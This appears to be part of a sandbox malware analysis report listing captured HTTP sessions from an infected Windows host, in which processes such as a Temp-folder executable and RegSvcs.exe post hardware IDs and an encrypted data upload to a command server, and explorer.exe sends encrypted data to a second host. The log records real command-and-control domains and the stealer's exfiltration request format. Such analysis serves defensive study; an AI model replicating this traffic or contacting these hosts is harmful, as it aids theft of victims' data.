Dec 27, 2023 18:13:12.605004072 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=7saupqvq4v05vn2s4pqkgb75ka; expires=Sun, 21-Apr-2024 10:59:51 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v%2BgQQCtJw4E6m%2BqhcCCM9tnvf%2BIz8bH5ZOZinBEJQEfesFYsVcZDh%2BhRrqODDaCYQPzDhn%2FNg%2FqTWl7FhE77GwkX7UirE0M8YLYuAPtUofwQamHpfQqXlqHlkhQpy2bFpXWlz5Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33 Data Raw: Data Ascii:
Dec 27, 2023 18:13:12.605015993 CET	45	IN	Data Raw: 35 62 63 65 34 34 34 36 30 63 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 5bce44460c-DFW15Malformed packet data
Dec 27, 2023 18:13:12.605026960 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49802	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:12.539798975 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:12.540079117 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:12.920387030 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=5aovu3o2p1v9se354koitgobth; expires=Sun, 21-Apr-2024 10:59:51 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:12 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x8Qs0sNgapaOTZpIpAyjxn36tdGTvP%2BzDfEepFtIarZpSRXb2pFXHngNJXn%2F5UougI33JQdXQtVWoXNtUFzgQNdndK%2FPehs%2F%2FKXKfnrQ4MyMyxb3sWVFhDFtsO5fklY2WjLOYfs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3315 Data Raw: Data Ascii:
Dec 27, 2023 18:13:12.920397997 CET	43	IN	Data Raw: 63 38 32 38 36 62 33 33 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: c8286b33-DFW15Malformed packet data
Dec 27, 2023 18:13:12.920408010 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49803	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:12.920253992 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:12.920309067 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:13.300868988 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=fnv3l161ee4s6v32ubghmq5u7n; expires=Sun, 21-Apr-2024 10:59:52 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4drcrBVhkwFvJ0bZIiU%2FzYIJZVRs5GFDG0s%2FlJTr%2BxuMy%2F3A6j8z3K5c50FgdG6tqEc5t4OOJu%2FLWZ11sUhGmN%2BnN2GXexkgvlcxyoUIPbkw72VahklMV4VPcuh8gOyONaolf88%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33 Data Raw: Data Ascii:
Dec 27, 2023 18:13:13.300883055 CET	45	IN	Data Raw: 36 30 32 61 36 32 36 62 39 64 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 602a626b9d-DFW15Malformed packet data
Dec 27, 2023 18:13:13.300893068 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49804	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:13.626930952 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:13.627010107 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:14.003113985 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=rn2fev658obcrt366tns0jgcca; expires=Sun, 21-Apr-2024 10:59:52 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:13 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rxtIr8V3LjVqa5XLWt6lxzMNFLhFmyaUjwPQgHEieQvjFMHyP3OGw18RA%2FGV8LOm7mjwscNoGvW0VwDbf2ifAx%2BDeA%2BnrKOS%2F1RfjGYEtz4%2BZmepECLiuyiyIF3bEb4bvsosbXY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3316 Data Raw: Data Ascii:
Dec 27, 2023 18:13:14.003132105 CET	43	IN	Data Raw: 39 62 64 32 36 62 38 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 9bd26b89-DFW15Malformed packet data
Dec 27, 2023 18:13:14.003144026 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49805	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:14.275937080 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:14.275976896 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:14.815951109 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=h3rofm19gmhqosd2kglhre9d7q; expires=Sun, 21-Apr-2024 10:59:53 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:14 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WOnkX9SNygz8JQC9l2XncsHZpxqzNXYaedVWqJLkOCn2%2Bw8kLdKsE4o1ejpOeLX3XqW1oDKpZURJJU0MTcKbYau51s%2FzC2tvquLt10TfBamWHIFEZ1a0nPjuqydGje4gnu9px0A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331689b3ae Data Raw: Data Ascii:
Dec 27, 2023 18:13:14.815962076 CET	37	IN	Data Raw: 66 33 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: f3-DFW15Malformed packet data
Dec 27, 2023 18:13:14.815972090 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49806	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:15.305141926 CET	367	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20453 Host: soupinterestoe.fun
Dec 27, 2023 18:13:15.305227041 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:15.426537037 CET	1286	OUT	Data Raw: 7c 99 d9 ef 59 b2 d3 79 eb 41 f2 6a 2e fa c0 bc bd 7b c3 59 a9 1d df 7f 5a eb bb ee 3a 6f 67 0e f5 3b d8 cd 95 36 76 1a 97 98 ec ba a2 17 06 db f3 9c db d8 7f 9f d5 cd f5 eb 7a cb a5 5d 5d d6 e7 b3 d1 23 53 af ee 5a 43 6a dd 72 d6 12 07 fb f5 b5 Data Ascii: \|YyAj.{YZ:og;6vz]]#SZCjrVxcG#ke3Q_}GD6euZvcO">3'G6gu:'Gi~f~4?Tvd}K~;j4Y{<vo}j+RXz/v-Kt.M
Dec 27, 2023 18:13:15.426553011 CET	7593	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 7e e6 0d a5 06 12 bb 6e 99 fd cc e1 b3 d9 f6 db cc 4d bf 76 39 d3 7e fb d0 bd 7f fd b9 81 f6 db c7 16 5e 78 30 dd 7e fb e1 57 3f f0 a1 54 fb ed 57 0b 57 be 91 cc a5 06 72 bb 6e b9 34 fe bd df 1d 8a da cb 86 b3 Data Ascii: ~nMv9~^x0~W?TWWrn4A"Q5'1W-+/^8+1+1uZuqYIFo?~?n(o!T.
Dec 27, 2023 18:13:15.886543036 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=67b6quvnkk28vg7ven5p9g5cic; expires=Sun, 21-Apr-2024 10:59:54 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ckRLxEhy2F5zIXTnxOy3pr83FBeZvKW4%2FiAvDu%2B91weaO8Emmt8t2Ilq5%2BvDBvu11DuPOvpAGKWJoc5yFWyK0WvCqIZ%2Fxs20zOSH6sbGVNoovxk%2Bg0BKXxoiGDhNt%2B%2FE7UlpZqs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c Data Raw: Data Ascii:
Dec 27, 2023 18:13:15.886719942 CET	40	IN	Data Raw: 33 31 36 66 30 39 38 32 34 36 31 31 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: 316f09824611-DFWfok 212.102.41.2
Dec 27, 2023 18:13:15.886732101 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49807	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:15.575351000 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:15.575544119 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:16.119636059 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=pvltafgfeg2127gc7hrujhb412; expires=Sun, 21-Apr-2024 10:59:54 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B%2BrDqz9zVlR44VRROvFf%2BXfGZWm6YSY%2FMaOpk8Gw%2Bl0xl870S%2Fwb2iMjtmoPgx2Li17sI0%2F0Fbbq1e30dEgC6VFT0Lm1WGRTqJIO0LQoRibTKuunOOwSkjSJqhjtay1Armr12P8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33 Data Raw: Data Ascii:
Dec 27, 2023 18:13:16.119678020 CET	45	IN	Data Raw: 37 30 62 38 62 61 65 61 65 65 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 70b8baeaee-DFW15Malformed packet data
Dec 27, 2023 18:13:16.119713068 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49808	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:16.287940025 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:16.288079023 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:16.670789003 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=9dqosnb4u11in2p4g434njd63g; expires=Sun, 21-Apr-2024 10:59:55 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bQ7Z91BAqzi9XNDZmZIuaXvWcwR3EnYNTml%2BO6nctf2JIgn6kVcrKkfxAEi8LhEowpg8%2FPFs0MCXt6sWufl4bEy7EGuLXmSdscJSoI8JSUvcKQkO8mlPDqTG9AkdX%2Ff5IKC1EaI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331753f3 Data Raw: Data Ascii:
Dec 27, 2023 18:13:16.670804977 CET	39	IN	Data Raw: 36 62 37 64 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6b7d-DFW15Malformed packet data
Dec 27, 2023 18:13:16.670814991 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49811	158.160.130.138	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:16.870879889 CET	273	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qmjxjlmwq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 139 Host: host-host-file8.com
Dec 27, 2023 18:13:16.870925903 CET	139	OUT	Data Raw: 10 87 f0 96 6a f9 a0 b6 cb 3a 0b 30 76 b8 e0 88 37 17 dd 3e d7 4c 68 90 c9 ee aa ff fe a0 93 f2 1e ba 28 d6 19 6e b9 97 eb a9 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1e dc dc 33 Data Ascii: j:0v7>Lh(nz\wu$f]d3@-\|p,K^lVxP\|\Yp<x4@^GN2h\|!rA?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49813	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
